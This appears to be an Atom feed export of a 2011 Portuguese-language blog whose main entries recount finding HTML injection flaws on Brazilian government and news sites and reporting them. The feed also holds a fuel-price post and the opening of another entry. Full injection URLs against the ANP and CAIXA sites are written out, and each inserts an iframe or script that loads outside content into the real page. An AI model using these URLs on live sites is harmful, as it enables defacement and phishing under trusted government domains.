Atenciosamente,<br />
<br />
Lucas Betti Domingues<br />
Equipe de Segurança Terra - Depto. de Abuse<br />
abuse@terra.com.br<br />
SAN - Servico de Atendimento Nacional<br />
Fax: (51) 3287-9087</code><br />
<br />
<b>UPDATE 19/05/2011 - 11h33</b><br />
<code> SINDEC corrigiu a "brecha".</code><br />
<br />
<b>UPDATE 23/05/2011 - 23h32</b><br />
<code>A CAIXA corrigiu a brecha pela metade, mas já foi um avanço. Vocês podem <a href="http://www1.caixa.gov.br/busca/resultados.asp?q2=1&q1=%27%29;}%29;window.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/caixa/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E%3C!--" title="Falha">testar aqui</a> e <a href="http://www1.caixa.gov.br/busca/resultados.asp?q2=1&q1=%27%29;}%29;%3C/script%3E%3Ciframe%20src=%22http://metal.mundobugado.org/caixa/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C!--" title="falha">aqui</a> para comprovar que ainda existe a falha.</code><br />
<br />
<b>UPDATE 07/06/2011 - 17h08</b><br />
<code>O MF (Ministério da Fazenda) corrigiu a brecha. De um jeito tosco, mas corrigiu... agora eles retiram da busca os caracteres "&lt;" e "&gt;"</code>
		]]></content>
		<author>
			<name>metal</name>
		</author>
	</entry>
	
	
	
	<entry>
		<title>Quem procura, acha!</title>
		<link rel="alternate" type="text/html" href="http://metaldot.alucinados.com/pivot/entry.php?id=53&amp;w=my_weblog" />
		<updated>2011-05-17T03:36:00-03:00</updated>
		<published>2011-05-08T16:48:00-03:00</published>
		<id>tag:metaldot,2012:metaldot.53</id>
		<link rel="related" type="text/html" href=""  />
		<summary type="text">Você já tentou levantar os tapetes no corredor pra ver se tem alguma chave embaixo?

Depois do HTML Injection no site da ANP, fiquei com a pulga atrás da orelha, curioso, pra saber se outros sites também apresentavam a mesma falha. Minha mãe sempre diz: Quem procura, acha! E é claro que eu achei e não foram poucos.

.gov.br
ANP (Agência Nacional do Petróleo, Gás Natural e Biocombustíveis)Brazilian Tourism PortalCAIXA (O banco que acredita nas pessoas)CEB (Companhia Energética de Brasília)Domínio PúblicoEmbraturMF (Ministério da Fazenda)MINC (Ministério da Cultura)MMA (Ministério do Meio Ambiente)MME (Ministério de Minas e Energia)MDA (Ministério do Desenvolvimento Agrário)Portal da TransparênciaPlataforma LattesSINDEC (Sistema Nacional de Informações de Defesa do Consumidor)TCU (Tribunal de Contas da União)

Jornais
Carta MaiorEstadãoTerraDiário de São PauloO TEMPORede Minas</summary>
        <content type="html" xml:lang="pt" xml:base="http://metaldot.alucinados.com/pivot/entry.php?id=53&amp;w=my_weblog"><![CDATA[
                Você já tentou levantar os tapetes no corredor pra ver se tem alguma chave embaixo?<br />
<br />
Depois do <a href="http://metaldot.alucinados.com/pivot/entry.php?id=51&w=my_weblog" title="http://metaldot.alucinados.com/pivot/entry.php?id=51&w=my_weblog">HTML Injection no site da ANP</a>, fiquei com a pulga atrás da orelha, curioso, pra saber se outros <i>sites</i> também apresentavam a mesma falha. Minha mãe sempre diz: Quem procura, acha! E é claro que eu achei e não foram poucos.<br />
<br />
<h1>.gov.br</h1><br />
<table border="0" cellspacing="10"><tr valign="top"><td><a href='http://metaldot.alucinados.com/images/html_injection_anp.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_anp.thumb.png" border="0" alt="ANP (Agência Nacional do Petróleo, Gás Natural e Biocombustíveis)" title="ANP (Agência Nacional do Petróleo, Gás Natural e Biocombustíveis)" align="" class='pivot-popupimage' /></a><a href="http://anp.gov.br" title="ANP (Agência Nacional do Petróleo, Gás Natural e Biocombustíveis)">ANP (Agência Nacional do Petróleo, Gás Natural e Biocombustíveis)</a></td><td><a href='http://metaldot.alucinados.com/images/html_injection_braziltour.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_braziltour.thumb.png" border="0" alt="Brazilian Tourism Portal" title="Brazilian Tourism Portal" align="" class='pivot-popupimage' /></a><a href="http://braziltour.com" title="">Brazilian Tourism Portal</a></td><td><a href='http://metaldot.alucinados.com/images/html_injection_caixa.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_caixa.thumb.png" border="0" alt="CAIXA (O banco que acredita nas pessoas)" title="CAIXA (O banco que acredita nas pessoas)" align="" class='pivot-popupimage' /></a><a href="http://caixa.gov.br" title="">CAIXA (O banco que acredita nas pessoas)</a></td></tr><tr valign="top"><td><a href='http://metaldot.alucinados.com/images/html_injection_ceb.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_ceb.thumb.png" border="0" alt="CEB (Companhia Energética de Brasília)" title="CEB (Companhia Energética de Brasília)" align="" class='pivot-popupimage' /></a><a href="http://ceb.com.br" title="CEB (Companhia Energética de Brasília)">CEB (Companhia Energética de Brasília)</a></td><td><a href='http://metaldot.alucinados.com/images/html_injection_dominio_publico.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_dominio_publico.thumb.png" border="0" alt="Domínio Público" title="Domínio Público" align="" class='pivot-popupimage' /></a><a href="http://dominiopublico.gov.br" title="Domínio Público">Domínio Público</a></td><td><a href='http://metaldot.alucinados.com/images/html_injection_embratur.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_embratur.thumb.png" border="0" alt="Embratur" title="Embratur" align="" class='pivot-popupimage' /></a><a href="http://embratur.gov.br" title="Embratur">Embratur</a></td></tr><td><a href='http://metaldot.alucinados.com/images/html_injection_ministerio_da_fazenda.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_ministerio_da_fazenda.thumb.png" border="0" alt="MF (Ministério da Fazenda)" title="MF (Ministério da Fazenda)" align="" class='pivot-popupimage' /></a><a href="http://fazenda.gov.br" title="MF (Ministério da Fazenda)">MF (Ministério da Fazenda)</a></td><td><a href='http://metaldot.alucinados.com/images/html_injection_ministerio_da_cultura.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_ministerio_da_cultura.thumb.png" border="1" alt="" title="" align="MINC (Ministério da Cultura)" class='pivot-popupimage' /></a><a href="http://cultura.gov.br" title="MINC (Ministério da Cultura)">MINC (Ministério da Cultura)</a></td><td><a href='http://metaldot.alucinados.com/images/html_injection_ministerio_do_meio_ambiente.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_ministerio_do_meio_ambiente.thumb.png" border="0" alt="MMA (Ministério do Meio Ambiente)" title="MMA (Ministério do Meio Ambiente)" align="" class='pivot-popupimage' /></a><a href="http://mma.gov.br" title="MMA (Ministério do Meio Ambiente)">MMA (Ministério do Meio Ambiente)</a></td></tr><tr valign="top"><td><a href='http://metaldot.alucinados.com/images/html_injection_ministerio_de_minas_e_energia.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_ministerio_de_minas_e_energia.thumb.png" border="0" alt="MME (Ministério de Minas e Energia)" title="MME (Ministério de Minas e Energia)" align="" class='pivot-popupimage' /></a><a href="http://mme.gov.br" title="MME (Ministério de Minas e Energia)">MME (Ministério de Minas e Energia)</a></td><td><a href='http://metaldot.alucinados.com/images/html_injection_ministerio_do_desenvolvimento_agrario.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_ministerio_do_desenvolvimento_agrario.thumb.png" border="0" alt="MDA (Ministério do Desenvolvimento Agrário)" title="MDA (Ministério do Desenvolvimento Agrário)" align="" class='pivot-popupimage' /></a><a href="http://mda.gov.br" title="MDA (Ministério do Desenvolvimento Agrário)">MDA (Ministério do Desenvolvimento Agrário)</a></td><td><a href='http://metaldot.alucinados.com/images/html_injection_portal_da_trasparencia.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_portal_da_trasparencia.thumb.png" border="0" alt="Portal da Transparência" title="Portal da Transparência" align="" class='pivot-popupimage' /></a><a href="http://portaltransparencia.gov.br" title="Portal da Transparência">Portal da Transparência</a></td></tr><tr valign="top"><td><a href='http://metaldot.alucinados.com/images/html_injection_plataforma_lattes.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_plataforma_lattes.thumb.png" border="0" alt="Plataforma Lattes" title="Plataforma Lattes" align="" class='pivot-popupimage' /></a><a href="http://buscatextual.cnpq.br" title="Plataforma Lattes">Plataforma Lattes</a></td><td><a href='http://metaldot.alucinados.com/images/html_injection_sindec.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_sindec.thumb.png" border="0" alt="SINDEC (Sistema Nacional de Informações de Defesa do Consumidor)" title="SINDEC (Sistema Nacional de Informações de Defesa do Consumidor)" align="" class='pivot-popupimage' /></a><a href="https://sindecbh.pbh.gov.br:444/sindecatendimentoweb/" title="SINDEC (Sistema Nacional de Informações de Defesa do Consumidor)">SINDEC (Sistema Nacional de Informações de Defesa do Consumidor)</a></td><td><a href='http://metaldot.alucinados.com/images/html_injection_tribunal_de_contas_da_uniao.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_tribunal_de_contas_da_uniao.thumb.png" border="0" alt="TCU (Tribunal de Contas da União)" title="TCU (Tribunal de Contas da União)" align="" class='pivot-popupimage' /></a><a href="http://tcu.gov.br" title="TCU (Tribunal de Contas da União)">TCU (Tribunal de Contas da União)</a></td></tr></table><br />
<br />
<h1>Jornais</h1><br />
<table border="0" cellspacing="10"><tr valign="top"><td><a href='http://metaldot.alucinados.com/images/html_injection_carta_maior.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_carta_maior.thumb.png" border="0" alt="Carta Maior" title="Carta Maior" align="" class='pivot-popupimage' /></a><br /><a href="http://cartamaior.com.br" title="Carta Maior">Carta Maior</a></td><td><a href='http://metaldot.alucinados.com/images/html_injection_estadao.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_estadao.thumb.png" border="0" alt="Estadão" title="Estadão" align="" class='pivot-popupimage' /></a><br /><a href="http://estadao.com.br" title="Estadão">Estadão</a></td><td><a href='http://metaldot.alucinados.com/images/html_injection_terra.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_terra.thumb.png" border="0" alt="Terra" title="Terra" align="" class='pivot-popupimage' /></a><br /><a href="http://buscador.terra.com.br" title="Terra">Terra</a></td></tr><td><a href='http://metaldot.alucinados.com/images/html_injection_diariosp.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_diariosp.thumb.png" border="0" alt="Diário de São Paulo" title="Diário de São Paulo" align="" class='pivot-popupimage' /></a><br /><a href="http://diariosp.com.br" title="Diário de São Paulo">Diário de São Paulo</a></td><td><a href='http://metaldot.alucinados.com/images/html_injection_o_tempo.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_o_tempo.thumb.png" border="0" alt="O TEMPO" title="O TEMPO" align="" class='pivot-popupimage' /></a><br /><a href="http://otempo.com.br" title="O TEMPO">O TEMPO</a></td><td><a href='http://metaldot.alucinados.com/images/html_injection_redeminas.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_redeminas.thumb.png" border="0" alt="Rede Minas" title="Rede Minas" align="" class='pivot-popupimage' /></a><br /><a href="http://www.redeminas.mg.gov.br" title="Rede Minas">Rede Minas</a></td></tr></table>
		]]></content>
		<author>
			<name>metal</name>
		</author>
	</entry>
	
	
	
	<entry>
		<title>Composição dos preços dos combustíveis: qual é a verdade?</title>
		<link rel="alternate" type="text/html" href="http://metaldot.alucinados.com/pivot/entry.php?id=52&amp;w=my_weblog" />
		<updated>2011-05-05T13:05:00-03:00</updated>
		<published>2011-05-03T14:03:00-03:00</published>
		<id>tag:metaldot,2012:metaldot.52</id>
		<link rel="related" type="text/html" href=""  />
		<summary type="text">Imagem via blog da Petrobras
 Imagem via campanha para justificar os altos preços dos combustíveis



E aí, qual é a verdade?</summary>
        <content type="html" xml:lang="pt" xml:base="http://metaldot.alucinados.com/pivot/entry.php?id=52&amp;w=my_weblog"><![CDATA[
                <table border="0"><br />
<tr><br />
<td><p style="text-align:center;"><img src="http://metaldot.alucinados.com/images/composicao-de-preco.jpg" style="border:0px solid" title="Composição via Petrobras" alt="Composição via Petrobras" class="pivot-image" /></p> <p style="text-align:center;"><img src="http://metaldot.alucinados.com/images/bombagasolinanova.jpg" style="border:0px solid" title="Composição via Petrobras" alt="Composição via Petrobras" class="pivot-image" /></p> <br />Imagem via <a href="http://fatosedados.blogspetrobras.com.br/2011/04/07/preco-da-gasolina-mitos-e-verdades/" title="blog da Petrobras">blog da Petrobras</a></td><br />
<td><p style="text-align:center;"><img src="http://metaldot.alucinados.com/images/combustiveis_carissimos.jpg" style="border:0px solid" title="Composição via SindiCombustíveisDF" alt="Composição via SindiCombustíveisDF" class="pivot-image" /></p><br /> Imagem via <a href="http://sinpetrodf.com.br/index.php?opcao=local&tarefa=automake&interface=noticia_exibir&id=1304439074" title="campanha para justificar os altos preços dos combustíveis">campanha para justificar os altos preços dos combustíveis</a></td><br />
</tr><br />
</table><br />
<br />
E aí, qual é a verdade?
		]]></content>
		<author>
			<name>metal</name>
		</author>
	</entry>
	
	
	
	<entry>
		<title>Agência Nacional do Petróleo (ANP) e o mundo bugado</title>
		<link rel="alternate" type="text/html" href="http://metaldot.alucinados.com/pivot/entry.php?id=51&amp;w=my_weblog" />
		<updated>2011-04-12T00:20:00-03:00</updated>
		<published>2011-04-07T17:33:00-03:00</published>
		<id>tag:metaldot,2012:metaldot.51</id>
		<link rel="related" type="text/html" href=""  />
		<summary type="text">Após duas semanas revoltado com o alto preços dos combustíveis, decidi na madrugada do dia 05/04 fazer um post no twitter e identi.ca mostrando como foi abusivo o aumento do etanol (álcool) aqui em Brasília, que passou de R$ 2,02 para R$ 2,83.



Comentando com o Thiago Silva, ele falou que existia um sistema onde era possível visualizar os preços dos combustíveis em todo o Brasil. Acessamos o site da ANP e realmente o sistema possuía os preços atualizados por cidades e períodos. Observei que o formulário de pesquisa usava o método POST e não gerava uma URL amigável impossibilitando que eu mostrasse como estava caro os preços em Brasília. Como tenho conhecimento em HTML, comecei a ler o código do formulário para tentar gerar uma URL via método GET para conseguir publicar o link sobre o preço dos combustíveis em Brasília, para que outras pessoas acessassem diretamente a tabela de preços ao invés de preencher o formulário.

Acabei descobrindo que os campos "hidden", como por exemplo, o campo "selMunicipio" estava preenchido assim "1778*BRASILIA" e o campo "selSemana" estava "615*De 27/03/2011 a 02/04/2011". Percebendo isso, minha primeira reação foi tentar alterar o campo "selMunicipio" de "1778*BRASILIA" para "1778*A", e não é que apareceu escrito "A" ao invés de "BRASILIA", lá no site da ANP?! Mudei o "selMunicipio" para "1778*BRASILIA A CIDADE SEM LEI" e o "selSemana" para "615*De 27/03/2011 a 02/04/2011~INFINITO E ALEM" e publiquei a URL modificada aqui [1] e aqui [2].

Fiz mais um teste tentando colocar código HTML junto ao texto na URL e também funcionou. Ooooops ficou mais sério a falha de segurança.

Em paralelo aos testes, estava acontecendo muita conversa sobre os preços altos dos combustíveis e muita gente estava usando a hashtag combustivelmaisbaratoja.

Tive a ideia de fazer um abaixo-assinado e contribuir no assunto. Pensei em alguns métodos de como inserí-lo dentro da página da ANP, uma vez que eu consigo inserir código HTML na URL. Alguns minutos conversando com o Thiago, tive a ideia de usar um iframe. Comecei a desenvolver o formulário usando python-pesto, python-sqlalchemy e em alguns minutos depois estava pronto. Discutimos sobre onde hospedar e quais seriam as implicações. Decidimos hospedar o formulário no nosso próprio domínio mundobugado.org, numa forma de assumir, porque a nossa intenção era também demonstrar a falha no site e não só protestar.

Publiquei [1] e [2] a URL com o iframe e várias pessoas repassaram o link.

http://www.anp.gov.br/preco/prc/Resumo_Por_Municipio_Posto.asp?Tipo=2&amp;cod_Semana=615&amp;desc_Semana=A&amp;selCombustivel=643*A&amp;selMunicipio=1778*BRASILIA%20A%20CIDADE%20SEM%20LEI&amp;selSemana=615*De%2027/03/2011%20a%2002/04/2011~INFINITO%20E%20ALEM%3Ciframe%20src=%27http://mundobugado.org/anp%27%20height=%27500%27%20width=%27500%27%3E%3C/iframe%3E%3C!--

imagem via yaso:


No dia seguinte, dia 06/04, a ANP retirou o Sistema de Pesquisa de Preços do ar. Procurei saber o motivo, se era por nossa causa, e era. No microblog tinha o seguinte alerta:



Um alerta mentiroso, uma vez que usamos a própria URL do site da ANP e não algo como "anp.com.br" ou "anp.net", etc. (Um dúvida minha, qual é a relação entre formulário falso e o sistema estar em manutenção?! Pura desculpa para uma falha deles?!). Algum tempo depois, vários sites replicaram o alerta [1], [2], [3], [4].

Olhei alguns códigos do site da ANP e encontrei outras brechas [1] e [2]. Agora, não só o Sistema de Pesquisa de Preços estava com a falha, mas a maior parte dos formulários do site, incluindo a busca principal. ANP, agora vocês vão retirar o site todo do ar? E vão usar o que como desculpa pela mal programação?!



Optei agora por não espalhar a URL com o iframe e avisei [1] e [2] a ANP sobre as falhas, mas até agora não recebi uma resposta.

O lado negativo de tudo isso, é que uma falha boba, de fácil solução, deixou o sistema 24h ~ ao infinito e além fora do ar. Me deixando com a pulga atrás da orelha, pensando que mesmo que a TI da ANP demore pra corrigir a falha, o lado político de deixar o sistema fora do ar nesse momento de grande procura dos dados. Uma pena...

Espero ter esclarecido o que aconteceu. Happy hack!

ATUALIZAÇÂO: 08/04/2011 18h20

O Sistema de Pesquisa de Preços esta no ar novamente e parece corrigido. Mas reparei que a busca do site sumiu, que foi o meu outro bug report. Será que a ANP vai fazer uma nota sobre o assunto?!

ATUALIZAÇÂO: 08/04/2011 20h52

A busca no site da ANP ainda não voltou =/ Mas sexta-feira, numa hora dessas, deve ficar o fim de semana todo sem a busca. Espero que corrijam todas as falhas do mesmo tipo que levantei sobre HTML Injection e não só os dois formulários bugados que citei nesse "artigo". Para isso, tenho mais um formulário bugado para testar, agora é esperar pra ver.

ATUALIZAÇÂO: 11/04/2011 22h18

Olhei de manhã, de tarde, mas agora a busca no site ANP está de volta e corrigida. Mas, e as outras falhas, quando serão corrigidas?!</summary>
        <content type="html" xml:lang="pt" xml:base="http://metaldot.alucinados.com/pivot/entry.php?id=51&amp;w=my_weblog"><![CDATA[
                Após duas semanas revoltado com o alto preços dos combustíveis, decidi na madrugada do dia 05/04 fazer um <i>post</i> no <a href="http://twitter.com/#!/marcelometal/status/55112858060603392" title="">twitter</a> e <a href="http://identi.ca/notice/70437972" title="">identi.ca</a> mostrando como foi abusivo o aumento do etanol (álcool) aqui em Brasília, que passou de <b>R$ 2,02</b> para <b>R$ 2,83</b>.<br />
<br />
<p style="text-align:center;"><img src="http://metaldot.alucinados.com/images/combustivel_alto.jpg" style="border:0px solid" title="Combustível Caro" alt="Combustível Caro" class="pivot-image" /></p><br />
<br />
Comentando com o <a href="http://metareload.com" title="">Thiago Silva</a>, ele falou que existia um sistema onde era possível visualizar os preços dos combustíveis em todo o Brasil. Acessamos o site da <a href="http://anp.gov.br" title="">ANP</a> e realmente o sistema possuía os preços atualizados por cidades e períodos. Observei que o formulário de pesquisa usava o método <a href="http://en.wikipedia.org/wiki/POST_%28HTTP%29" title="">POST</a> e não gerava uma <a href="http://brunotorres.net/urls" title="">URL amigável</a> impossibilitando que eu mostrasse como estava caro os preços em <a href="http://pt.wikipedia.org/wiki/Bras%C3%ADlia" title="">Brasília</a>. Como tenho conhecimento em <a href="http://pt.wikipedia.org/wiki/HTML" title="">HTML</a>, comecei a ler o código do formulário para tentar gerar uma <a href="http://pt.wikipedia.org/wiki/URL" title="">URL</a> via método <a href="http://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol#Request_methods" title="">GET</a> para conseguir publicar o link sobre o preço dos combustíveis em Brasília, para que outras pessoas acessassem diretamente a tabela de preços ao invés de preencher o formulário.<br />
<br />
Acabei descobrindo que os campos "<a href="http://www.w3schools.com/aspnet/control_htmlinputhidden.asp" title="">hidden</a>", como por exemplo, o campo "selMunicipio" estava preenchido assim "<b>1778*BRASILIA</b>" e o campo "selSemana" estava "<b>615*De 27/03/2011 a 02/04/2011</b>". Percebendo isso, minha primeira reação foi tentar alterar o campo "selMunicipio" de "<b>1778*BRASILIA</b>" para "<b>1778*A</b>", e não é que apareceu escrito "<b>A</b>" ao invés de "<b>BRASILIA</b>", lá no site da <a href="http://anp.gov.br" title="">ANP</a>?! Mudei o "selMunicipio" para "<b>1778*BRASILIA A CIDADE SEM LEI</b>" e o "selSemana" para "<b>615*De 27/03/2011 a 02/04/2011~INFINITO E ALEM</b>" e publiquei a <a href="http://pt.wikipedia.org/wiki/URL" title="">URL</a> modificada aqui <a href="http://twitter.com/#!/marcelometal/status/55120688759062528" title="">[1]</a> e aqui <a href="http://identi.ca/notice/70439864" title="">[2]</a>.<br />
<br />
Fiz mais um teste tentando colocar código HTML junto ao texto na <a href="http://pt.wikipedia.org/wiki/URL" title="">URL</a> e também funcionou. Ooooops ficou mais sério a falha de segurança.<br />
<br />
Em paralelo aos testes, estava acontecendo muita conversa sobre os preços altos dos combustíveis e muita gente estava usando a hashtag <a href="http://twitter.com/#!/search/%23combustivelmaisbaratoja" title="">combustivelmaisbaratoja</a>.<br />
<br />
Tive a ideia de fazer um abaixo-assinado e contribuir no assunto. Pensei em alguns métodos de como inserí-lo dentro da página da <a href="http://anp.gov.br" title="">ANP</a>, uma vez que eu consigo inserir código HTML na <a href="http://pt.wikipedia.org/wiki/URL" title="">URL</a>. Alguns minutos conversando com o Thiago, tive a ideia de usar um <a href="http://www.w3schools.com/TAGS/tag_iframe.asp" title="">iframe</a>. Comecei a desenvolver o formulário usando <a href="http://packages.debian.org/sid/python-pesto" title="">python-pesto</a>, <a href="http://packages.debian.org/sid/python-sqlalchemy" title="">python-sqlalchemy</a> e em alguns minutos depois estava pronto. Discutimos sobre onde hospedar e quais seriam as implicações. Decidimos hospedar o formulário no nosso próprio domínio <a href="http://mundobugado.org" title="">mundobugado.org</a>, numa forma de assumir, porque a nossa intenção era também demonstrar a falha no site e não só protestar.<br />
<br />
Publiquei <a href="http://twitter.com/#!/marcelometal/status/55282216321814528" title="">[1]</a> e <a href="http://identi.ca/notice/70477181" title="">[2]</a> a <a href="http://pt.wikipedia.org/wiki/URL" title="">URL</a> com o iframe e várias pessoas repassaram o link.<br />
<br />
<code>http://www.anp.gov.br/preco/prc/Resumo_Por_Municipio_Posto.asp?Tipo=2&cod_Semana=615&desc_Semana=A&selCombustivel=643*A&selMunicipio=1778*BRASILIA%20A%20CIDADE%20SEM%20LEI&selSemana=615*De%2027/03/2011%20a%2002/04/2011~INFINITO%20E%20ALEM%3Ciframe%20src=%27http://mundobugado.org/anp%27%20height=%27500%27%20width=%27500%27%3E%3C/iframe%3E%3C!--</code><br />
<br />
imagem via <a href="http://ingraxa.eu/" title="">yaso</a>:<br />
<p style="text-align:center;"><a href='http://metaldot.alucinados.com/images/anp_s1.jpg'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/anp_s1.thumb.jpg" border="0" alt="Imagem do site com a URL modificada" title="Imagem do site com a URL modificada"  class='pivot-popupimage'/></a></p><br />
<br />
No dia seguinte, dia 06/04, a <a href="http://anp.gov.br" title="">ANP</a> retirou o <a href="http://anp.gov.br/preco" title="">Sistema de Pesquisa de Preços</a> do ar. Procurei <a href="http://www.anp.gov.br/?pg=46526" title="">saber o motivo</a>, se era por nossa causa, e era. No <a href="http://pt.wikipedia.org/wiki/Microblogging" title="">microblog</a> tinha o seguinte alerta:<br />
<br />
<p style="text-align:center;"><img src="http://metaldot.alucinados.com/images/anp_alert_falso.jpg" style="border:0px solid" title="Imagem do site com a URL modificada" alt="Imagem do site com a URL modificada" class="pivot-image" /></p><br />
<br />
Um <b>alerta mentiroso</b>, uma vez que usamos a própria <a href="http://pt.wikipedia.org/wiki/URL" title="">URL</a> do site da <a href="http://anp.gov.br" title="">ANP</a> e não algo como "anp.com.br" ou "anp.net", etc. (Um dúvida minha, qual é a relação entre formulário falso e o sistema estar em manutenção?! Pura desculpa para uma falha deles?!). Algum tempo depois, vários sites replicaram o alerta <a href="http://tudonahora.uol.com.br/noticia/brasil/2011/04/06/136469/anp-faz-alerta-para-circulacao-de-endereco-falso-sobre-precos-na-internet" title="">[1]</a>, <a href="http://petrogasnews.wordpress.com/2011/04/07/anp-alerta-para-site-falso/" title="">[2]</a>, <a href="http://www.energiahoje.com/online/petroleo/logistica-e-comercializacao/2011/04/06/429844/anp-alerta-para-site-falso.html" title="">[3]</a>, <a href="http://www.abegas.org.br/imp_noticia_view.php?CodNot=21940&CodEditoria=4" title="">[4]</a>.<br />
<br />
Olhei alguns códigos do site da <a href="http://anp.gov.br" title="">ANP</a> e encontrei outras brechas <a href="http://www.anp.gov.br/SITE/acao/estaaqui/" title="">[1]</a> e <a href="http://www.anp.gov.br/" title="">[2]</a>. Agora, não só o Sistema de Pesquisa de Preços estava com a falha, mas a maior parte dos formulários do site, incluindo a busca principal. <b><a href="http://anp.gov.br" title="">ANP</a>, agora vocês vão retirar o site todo do ar?</b> E vão usar o que como desculpa pela mal programação?!<br />
<br />
<p style="text-align:center;"><a href='http://metaldot.alucinados.com/images/anp_falha2.jpg'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/anp_falha2.thumb.jpg" border="0" alt="Imagem do site com a URL modificada" title="Imagem do site com a URL modificada"  class='pivot-popupimage'/></a></p><br />
<br />
Optei agora por não espalhar a <a href="http://pt.wikipedia.org/wiki/URL" title="">URL</a> com o iframe e avisei <a href="http://twitter.com/#!/marcelometal/status/55723004583346176" title="">[1]</a> e <a href="http://identi.ca/notice/70556276" title="">[2]</a> a <a href="http://anp.gov.br" title="">ANP</a> sobre as falhas, mas até agora não recebi uma resposta.<br />
<br />
O lado negativo de tudo isso, é que uma falha boba, de fácil solução, deixou o sistema 24h ~ ao infinito e além fora do ar. Me deixando com a pulga atrás da orelha, pensando que mesmo que a <a href="http://pt.wikipedia.org/wiki/Tecnologia_da_informa%C3%A7%C3%A3o" title="">TI</a> da ANP demore pra corrigir a falha, o lado político de deixar o sistema fora do ar nesse momento de grande procura dos dados. Uma pena...<br />
<br />
Espero ter esclarecido o que aconteceu. <b>Happy hack!</b><br />
<br />
<b>ATUALIZAÇÂO: 08/04/2011 18h20</b><br />
<br />
O <a href="http://anp.gov.br/preco" title="">Sistema de Pesquisa de Preços</a> esta no ar novamente e parece corrigido. Mas reparei que a busca do site sumiu, que foi o meu outro bug report. Será que a ANP vai fazer uma nota sobre o assunto?!<br />
<br />
<b>ATUALIZAÇÂO: 08/04/2011 20h52</b><br />
<br />
A busca no site da ANP ainda não voltou =/ Mas sexta-feira, numa hora dessas, deve ficar o fim de semana todo sem a busca. Espero que corrijam todas as falhas do mesmo tipo que levantei sobre <a href="http://en.wikipedia.org/wiki/Code_injection" title="">HTML Injection</a> e não só os dois formulários bugados que citei nesse "artigo". Para isso, tenho mais um formulário bugado para testar, agora é esperar pra ver.<br />
<br />
<b>ATUALIZAÇÂO: 11/04/2011 22h18</b><br />
<br />
Olhei de manhã, de tarde, mas agora a busca no site ANP está de volta e corrigida.<b> Mas, e as outras falhas, quando serão corrigidas?!</b>
		]]></content>
		<author>
			<name>metal</name>
		</author>
	</entry>
	
	
	
	<entry>
		<title>JuntaDados e o Hall da vergonha</title>
		<link rel="alternate" type="text/html" href="http://metaldot.alucinados.com/pivot/entry.php?id=50&amp;w=my_weblog" />
		<updated>2010-10-01T17:12:00-03:00</updated>
		<published>2010-10-01T15:58:00-03:00</published>
		<id>tag:metaldot,2012:metaldot.50</id>
		<link rel="related" type="text/html" href=""  />
		<summary type="text">No dia 24/05/2010 eu li sobre a nova revisão da distribuição multimídia juntaDados 1.04r3. Achei interessante porque eu sabia que a Fabiana "Goa" e o Marcelo Souza estavam envolvidos, uma vez que trabalhei no minC e eles fazem parte de um dos Pontões de Cultura Digital. Lendo sobre a nova revisão do juntaDados reparei que não falava do código fonte, então comentei sobre isso na sala XMPP da MinasLivre. O Gustavo 'kov'  Noronha entrou no fórum e fez um comentário perguntando sobre o código fonte. Ele recebeu uma resposta falando que era o mesmo código do Ubuntu e que se ele quisesse era só pegar os fontes nos mirrors do Ubuntu, porque eles não tinham infra-estrutura para manter o código fonte, que na minha opinião é uma desculpa boba, uma vez que eles podiam gerar um ISO com os fontes (a resposta publicada no dia foi editada e eu não tenho a original, mas tenho uma cópia de segurança do que esta publicado hoje).

